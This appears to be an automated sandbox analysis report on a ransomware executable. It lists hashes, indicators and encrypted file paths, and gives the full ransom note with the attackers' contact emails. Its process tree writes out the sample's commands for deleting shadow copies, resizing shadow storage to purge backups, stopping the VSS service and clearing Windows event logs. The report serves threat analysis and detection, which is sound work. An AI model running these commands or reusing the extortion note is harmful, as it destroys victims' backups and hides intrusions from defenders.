56074a1d055957fe372a60582fa9603b4d683a029c0abbc490dcb5c44bc56885

General

Target

tcvjuo.exe
Size

4.8MB
MD5

99a4a7145a78577d18ab6547210e5fec
SHA1

20374dec61f839f1392bab96fc8e71f0e18ff334
SHA256

56074a1d055957fe372a60582fa9603b4d683a029c0abbc490dcb5c44bc56885
SHA512

e4d7213e2fdd38b159324cb486245414ac140e95089cb04e472c8df9c84c22560876c383da2d726e04f034c390993a2c19d3b3974f2e92f26843f04ce99693b6
SSDEEP

98304:S3l8ZSUOy+EvVHBafvJNOMN5bZ9BSZJB:ClE9WvD1NrKL

Score

10^/10

evasion ransomware

Malware Config

Extracted

Path

C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\HOW TO RESTORE YOUR TCVJUO FILES.TXT

Ransom Note

THE ENTIRE NETWORK IS ENCRYPTED YOUR BUSINESS IS LOSING MONEY! Dear Management! We inform you that your network has undergone a penetration test, during which we encrypted your files and downloaded more than 100GB of your data Personal data Marketing data Confidential documents Accounting Copy of some mailboxes Important! Do not try to decrypt the files yourself or using third-party utilities. The only program that can decrypt them is our decryptor, which you can request from the contacts below. Any other program will only damage files in such a way that it will be impossible to restore them. Write to us directly, without resorting to intermediaries, they will deceive you. You can get all the necessary evidence, discuss with us possible solutions to this problem and request a decryptor by using the contacts below. Free decryption as a guarantee. Send us up 3 files for free decryption. The total file size should be no more than 1 MB! (not in the archive). Please be advised that if we don't receive a response from you within 3 days, we reserve the right to publish files to the public. Contact us: master1restore@cock.li or 2020host2021@tutanota.com

Emails

master1restore@cock.li

2020host2021@tutanota.com

Signatures

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
1400	wevtutil.exe
4868	wevtutil.exe
4988	wevtutil.exe
4116	wevtutil.exe
4396
4640	wevtutil.exe
1260	wevtutil.exe
3568	wevtutil.exe
4240	wevtutil.exe
4212
4416	wevtutil.exe
3876	wevtutil.exe
1904	wevtutil.exe
2804	wevtutil.exe
2628	wevtutil.exe
2368
4380
1700
4844	wevtutil.exe
2208	wevtutil.exe
4992	wevtutil.exe
532	wevtutil.exe
772	wevtutil.exe
2184	wevtutil.exe
2020	wevtutil.exe
936	wevtutil.exe
4896	wevtutil.exe
4396
1828
4524	wevtutil.exe
4312	wevtutil.exe
1232	wevtutil.exe
3036	wevtutil.exe
4460
3676
4756	wevtutil.exe
1936	wevtutil.exe
2432	wevtutil.exe
4428	wevtutil.exe
4592
3468	wevtutil.exe
2996
3228	wevtutil.exe
3924	wevtutil.exe
1156	wevtutil.exe
3932	wevtutil.exe
3572	wevtutil.exe
3460	wevtutil.exe
4940	wevtutil.exe
5048	wevtutil.exe
3388	wevtutil.exe
4408	wevtutil.exe
2496	wevtutil.exe
3652	wevtutil.exe
3852	wevtutil.exe
3344	wevtutil.exe
3572	wevtutil.exe
3628	wevtutil.exe
3676	wevtutil.exe
4860	wevtutil.exe
712	wevtutil.exe
1564	wevtutil.exe
4728	wevtutil.exe
4640	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe

Drops file in Program Files directory 64 IoCs

Processes:

tcvjuo.exe

description	ioc	process
File created	\??\c:\Program Files\Microsoft Office\root\Office16\MSIPC\nl\HOW TO RESTORE YOUR TCVJUO FILES.TXT	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019XC2RVL_KMS_ClientC2R-ul-oob.xrm-ms.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL087.XML	tcvjuo.exe
File created	\??\c:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\HOW TO RESTORE YOUR TCVJUO FILES.TXT	tcvjuo.exe
File opened for modification	\??\c:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\vlc.mo.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraWideTile.scale-125.png	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\Ratings\Yelp9.scale-200.png	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_LogoSmall.targetsize-48.png	tcvjuo.exe
File created	\??\c:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Microsoft.Msn.Controls\EndOfLife\Assets\HOW TO RESTORE YOUR TCVJUO FILES.TXT	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\NoteToolbox-light.png	tcvjuo.exe
File created	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\HOW TO RESTORE YOUR TCVJUO FILES.TXT	tcvjuo.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\COPYING.LGPLv2.1.txt	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\91.jpg	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-256_altform-unplated_devicefamily-colorfulunplated.png	tcvjuo.exe
File created	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\misc\HOW TO RESTORE YOUR TCVJUO FILES.TXT	tcvjuo.exe
File created	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\HOW TO RESTORE YOUR TCVJUO FILES.TXT	tcvjuo.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\bg_get.svg.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\preface.htm	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessDemoR_BypassTrial365-ppd.xrm-ms.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\download-btn.png.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_11811.1001.18.0_x64__8wekyb3d8bbwe\Assets\AppTiles\StoreLogo.png	tcvjuo.exe
File created	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\da-dk\HOW TO RESTORE YOUR TCVJUO FILES.TXT	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\Office16\1033\TellMePowerPoint.nrr	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_should.help.txt	tcvjuo.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter_18.svg.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.expressions_3.4.600.v20140128-0851.jar.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\fr-FR\MSFT_PackageManagement.schema.mfl.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\msedge_100_percent.pak.DATA.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-cn\ui-strings.js.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_Subscription-ppd.xrm-ms	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-96.png	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\PhotosMedTile.scale-125.png	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-60.png	tcvjuo.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\root\ui-strings.js.tcvjuo	tcvjuo.exe
File created	\??\c:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules\Example3.Diagnostics\1.1.1\HOW TO RESTORE YOUR TCVJUO FILES.TXT	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.zh_CN_5.5.0.165303.jar.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\LinkedInboxMediumTile.scale-100.png	tcvjuo.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Microsoft.VCLibs.x86.14.00.appx.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons_fw.png.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-64_altform-unplated.png	tcvjuo.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_download_pdf_18.svg.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-flag-dark@2x.png.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUECALM\BLUECALM.INF	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessEntry2019R_PrepidBypass-ppd.xrm-ms.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root-bridge-test.xrm-ms.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-ppd.xrm-ms	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-moreimages.png.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_zh_CN.jar	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\Office16\MEDIA\ARROW.WAV.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubSplashWideTile.scale-100_contrast-white.png	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\EnsoUI\id_arrow.png	tcvjuo.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_opencarat_18.svg.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_de_135x40.svg.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\db\LICENSE.tcvjuo	tcvjuo.exe
File opened for modification	\??\c:\Program Files\Windows Media Player\Network Sharing\wmpnss_color32.bmp	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\9.png	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-36.png	tcvjuo.exe
File opened for modification	\??\c:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-24.png	tcvjuo.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_fr_135x40.svg.tcvjuo	tcvjuo.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

pid	process
280
2324
4428
4936
4428
288
4480
3744
2120
3772
624
3156
1704
4728
772
4804
2644
2212
4392
1244
4416
464
2164
4248
2184
2336
3652
4140
2664
284
3248
2392
1816
5072
276
2056
3888
3884
2500
3372
436
3248
640
1780
3480
4828
1792
2920
4500
4972
4464
4908
3884
4032
4980
1156
4888
4988
1232
2804
532
4904
4948
5068

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exe

pid process

1500 timeout.exe
4080

pid	process
1500	timeout.exe
4080

Interacts with shadow copies 2 TTPs 17 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
3224	vssadmin.exe
3948	vssadmin.exe
4116	vssadmin.exe
3320
2876	vssadmin.exe
2592	vssadmin.exe
4444	vssadmin.exe
1784
1520
2660	vssadmin.exe
1604
624	vssadmin.exe
4380	vssadmin.exe
1568	vssadmin.exe
2468	vssadmin.exe
904	vssadmin.exe
1404

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

tcvjuo.exe

pid process

2328 tcvjuo.exe

pid	process
2328	tcvjuo.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

vssvc.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeBackupPrivilege	4904	vssvc.exe
Token: SeRestorePrivilege	4904	vssvc.exe
Token: SeAuditPrivilege	4904	vssvc.exe
Token: SeSecurityPrivilege	2996	wevtutil.exe
Token: SeBackupPrivilege	2996	wevtutil.exe
Token: SeSecurityPrivilege	2460	wevtutil.exe
Token: SeBackupPrivilege	2460	wevtutil.exe
Token: SeSecurityPrivilege	2824	wevtutil.exe
Token: SeBackupPrivilege	2824	wevtutil.exe
Token: SeSecurityPrivilege	1320	wevtutil.exe
Token: SeBackupPrivilege	1320	wevtutil.exe
Token: SeSecurityPrivilege	3748	wevtutil.exe
Token: SeBackupPrivilege	3748	wevtutil.exe
Token: SeSecurityPrivilege	4580	wevtutil.exe
Token: SeBackupPrivilege	4580	wevtutil.exe
Token: SeSecurityPrivilege	4728	wevtutil.exe
Token: SeBackupPrivilege	4728	wevtutil.exe
Token: SeSecurityPrivilege	3756	wevtutil.exe
Token: SeBackupPrivilege	3756	wevtutil.exe
Token: SeSecurityPrivilege	4424	wevtutil.exe
Token: SeBackupPrivilege	4424	wevtutil.exe
Token: SeSecurityPrivilege	1752	wevtutil.exe
Token: SeBackupPrivilege	1752	wevtutil.exe
Token: SeSecurityPrivilege	1712	wevtutil.exe
Token: SeBackupPrivilege	1712	wevtutil.exe
Token: SeSecurityPrivilege	2336	wevtutil.exe
Token: SeBackupPrivilege	2336	wevtutil.exe
Token: SeSecurityPrivilege	3156	wevtutil.exe
Token: SeBackupPrivilege	3156	wevtutil.exe
Token: SeSecurityPrivilege	4376	wevtutil.exe
Token: SeBackupPrivilege	4376	wevtutil.exe
Token: SeSecurityPrivilege	4640	wevtutil.exe
Token: SeBackupPrivilege	4640	wevtutil.exe
Token: SeSecurityPrivilege	4248	wevtutil.exe
Token: SeBackupPrivilege	4248	wevtutil.exe
Token: SeSecurityPrivilege	2248	wevtutil.exe
Token: SeBackupPrivilege	2248	wevtutil.exe
Token: SeSecurityPrivilege	2604	wevtutil.exe
Token: SeBackupPrivilege	2604	wevtutil.exe
Token: SeSecurityPrivilege	1868	wevtutil.exe
Token: SeBackupPrivilege	1868	wevtutil.exe
Token: SeSecurityPrivilege	4524	wevtutil.exe
Token: SeBackupPrivilege	4524	wevtutil.exe
Token: SeSecurityPrivilege	4952	wevtutil.exe
Token: SeBackupPrivilege	4952	wevtutil.exe
Token: SeSecurityPrivilege	3228	wevtutil.exe
Token: SeBackupPrivilege	3228	wevtutil.exe
Token: SeSecurityPrivilege	752	wevtutil.exe
Token: SeBackupPrivilege	752	wevtutil.exe
Token: SeSecurityPrivilege	864	wevtutil.exe
Token: SeBackupPrivilege	864	wevtutil.exe
Token: SeSecurityPrivilege	5052	wevtutil.exe
Token: SeBackupPrivilege	5052	wevtutil.exe
Token: SeSecurityPrivilege	2704	wevtutil.exe
Token: SeBackupPrivilege	2704	wevtutil.exe
Token: SeSecurityPrivilege	2812	wevtutil.exe
Token: SeBackupPrivilege	2812	wevtutil.exe
Token: SeSecurityPrivilege	1352	wevtutil.exe
Token: SeBackupPrivilege	1352	wevtutil.exe
Token: SeSecurityPrivilege	4860	wevtutil.exe
Token: SeBackupPrivilege	4860	wevtutil.exe
Token: SeSecurityPrivilege	1956	wevtutil.exe
Token: SeBackupPrivilege	1956	wevtutil.exe
Token: SeSecurityPrivilege	2672	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 2288 wrote to memory of 1824	2288	cmd.exe	sc.exe
PID 2288 wrote to memory of 1824	2288	cmd.exe	sc.exe
PID 2288 wrote to memory of 1500	2288	cmd.exe	timeout.exe
PID 2288 wrote to memory of 1500	2288	cmd.exe	timeout.exe
PID 2288 wrote to memory of 3224	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 3224	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 2876	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 2876	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 624	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 624	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 3948	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 3948	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 4380	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 4380	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 2592	2288	cmd.exe	cmd.exe
PID 2288 wrote to memory of 2592	2288	cmd.exe	cmd.exe
PID 2288 wrote to memory of 2660	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 2660	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 1568	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 1568	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 4116	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 4116	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 2468	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 2468	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 4444	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 4444	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 904	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 904	2288	cmd.exe	vssadmin.exe
PID 2288 wrote to memory of 2796	2288	cmd.exe	sc.exe
PID 2288 wrote to memory of 2796	2288	cmd.exe	sc.exe
PID 2288 wrote to memory of 2592	2288	cmd.exe	cmd.exe
PID 2288 wrote to memory of 2592	2288	cmd.exe	cmd.exe
PID 2592 wrote to memory of 2996	2592	cmd.exe	wevtutil.exe
PID 2592 wrote to memory of 2996	2592	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 2460	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 2460	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 2824	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 2824	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 1320	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 1320	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 3748	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 3748	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 4580	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 4580	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 4728	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 4728	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 3756	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 3756	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 4424	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 4424	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 1752	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 1752	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 1712	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 1712	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 2336	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 2336	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 3156	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 3156	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 4376	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 4376	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 4640	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 4640	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 4248	2288	cmd.exe	wevtutil.exe
PID 2288 wrote to memory of 4248	2288	cmd.exe	wevtutil.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\tcvjuo.exe
"C:\Users\Admin\AppData\Local\Temp\tcvjuo.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2328

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "c:\windows\temp\liyd.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2288

C:\Windows\system32\sc.exe
sc start vss
2⤵
PID:1824

C:\Windows\system32\timeout.exe
timeout /T 5
2⤵
- Delays execution with timeout.exe
PID:1500

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
2⤵
- Interacts with shadow copies
PID:3224

C:\Windows\System32\vssadmin.exe
C:\Windows\System32\vssadmin.exe Delete Shadows /all /quiet
2⤵
- Interacts with shadow copies
PID:2876

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
2⤵
- Interacts with shadow copies
PID:624

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
2⤵
- Interacts with shadow copies
PID:3948

C:\Windows\System32\vssadmin.exe
C:\Windows\System32\vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB
2⤵
- Interacts with shadow copies
PID:4380

C:\Windows\System32\vssadmin.exe
C:\Windows\System32\vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=unbounded
2⤵
- Interacts with shadow copies
PID:2592

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=F: /on=F: /maxsize=401MB
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2660

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=F: /on=F: /maxsize=unbounded
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1568

C:\Windows\System32\vssadmin.exe
C:\Windows\System32\vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=401MB
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4116

C:\Windows\System32\vssadmin.exe
C:\Windows\System32\vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=unbounded
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2468

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
2⤵
- Interacts with shadow copies
PID:4444

C:\Windows\System32\vssadmin.exe
C:\Windows\System32\vssadmin.exe Delete Shadows /all /quiet
2⤵
- Interacts with shadow copies
PID:904

C:\Windows\system32\sc.exe
sc stop VSS
2⤵
PID:2796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c WEVTUTIL EL
2⤵
- Suspicious use of WriteProcessMemory
PID:2592

C:\Windows\system32\wevtutil.exe
WEVTUTIL EL
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2996

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "AMSI/Debug"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2460

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "AirSpaceChannel"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2824

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Analytic"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1320

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Application"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3748

C:\Windows\system32\wevtutil.exe
